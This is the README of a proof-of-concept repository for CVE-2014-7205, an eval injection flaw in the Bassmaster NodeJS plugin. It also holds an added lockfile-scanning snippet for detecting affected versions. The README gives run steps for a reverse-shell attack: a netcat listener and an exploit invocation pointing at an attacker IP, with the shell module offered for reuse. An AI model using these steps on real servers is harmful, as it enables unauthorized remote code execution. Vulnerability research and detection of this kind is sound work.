# Bassmaster NodeJS Plugin RCE PoC
* bassmaster-rce.py: A Python script to exploit CVE-2014-7205.
* nodeshell.py: A Python module to generate a reverse shell for NodeJS
**!!Only use against servers on which you have permission to test**
## Summary
CVE-2014-7205 is a Remote Code Execution vulnerability in the Bassmaster plugin
for NodeJS. All versions <= 1.5.1 are affected. The vulnerability exists in the
internals.batch function in lib/batch.js, where a call to eval() uses
improperly escaped user input (basically, the regex doesn't check whether the
request contains malicious code).
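To check whether a project installs a version in the affected range stated above, the following added example (not part of this repository) scans a parsed npm `package-lock.json` for `bassmaster` <= 1.5.1. The function names and the two sample lockfiles are constructed for illustration; the lockfile layouts are npm's v1 `dependencies` tree and v2/v3 `packages` map.

```javascript
// Added example: flag bassmaster <= 1.5.1 (the range this README gives for CVE-2014-7205).
// Input is an already-parsed package-lock.json object.
const LAST_AFFECTED = [1, 5, 1];

// Parse "1.5.1" or "1.5.1-beta" into [1, 5, 1]; null if it is not an x.y.z version.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(v));
  return m ? m.slice(1).map(Number) : null;
}

function isAffected(version) {
  const v = parseVersion(version);
  if (!v) return true; // git URL, tag, missing field: report for manual review
  for (let i = 0; i < 3; i++) {
    if (v[i] !== LAST_AFFECTED[i]) return v[i] < LAST_AFFECTED[i];
  }
  return true; // exactly 1.5.1
}

// Collect every installed copy of bassmaster, including transitive ones.
function findBassmaster(lock) {
  const hits = [];
  // lockfileVersion 2/3: flat map keyed by install path.
  for (const [path, info] of Object.entries(lock.packages || {})) {
    if (path.endsWith("node_modules/bassmaster")) hits.push({ path, version: info.version });
  }
  // lockfileVersion 1: nested "dependencies" tree (skipped when "packages" exists,
  // because v2 lockfiles carry both and would be counted twice).
  const walk = (deps, trail) => {
    for (const [name, info] of Object.entries(deps || {})) {
      if (name === "bassmaster") hits.push({ path: trail.concat(name).join(" > "), version: info.version });
      walk(info.dependencies, trail.concat(name));
    }
  };
  if (!lock.packages) walk(lock.dependencies, []);
  return hits.map((h) => ({ ...h, affected: isAffected(h.version) }));
}

// Constructed sample lockfiles (hypothetical project and package names).
const sampleV1 = { lockfileVersion: 1, dependencies: {
  "example-api": { version: "2.0.0", dependencies: { bassmaster: { version: "1.5.1" } } } } };
const sampleV3 = { lockfileVersion: 3, packages: {
  "": { name: "example-app" },
  "node_modules/bassmaster": { version: "1.5.2" } } };

console.log(findBassmaster(sampleV1), findBassmaster(sampleV3));
```

Any hit with `affected: true` should be upgraded past 1.5.1; entries whose version could not be parsed are reported as affected so they get a manual look.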
## Proof of Concept
1. Download or clone the git repo
2. Open a netcat listener in a bash terminal

   `nc -lvp 4444`
3. Make sure bassmaster-rce.py and nodeshell.py are in the same folder
4. Run bassmaster-rce.py

   `python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444`
## Other
* nodeshell.py is fully portable to other PoCs and exploits written in Python
that also need to generate a reverse shell for NodeJS
```
[4.0K] /data/pocs/745bd64795c9ee1dbd641355db10f4e6dbf9a344
├── [3.6K] bassmaster-rce-poc.py
├── [3.8K] nodeshell.py
├── [4.0K] __pycache__
│   └── [1.9K] nodeshell.cpython-38.pyc
└── [1.0K] README.md

1 directory, 4 files
```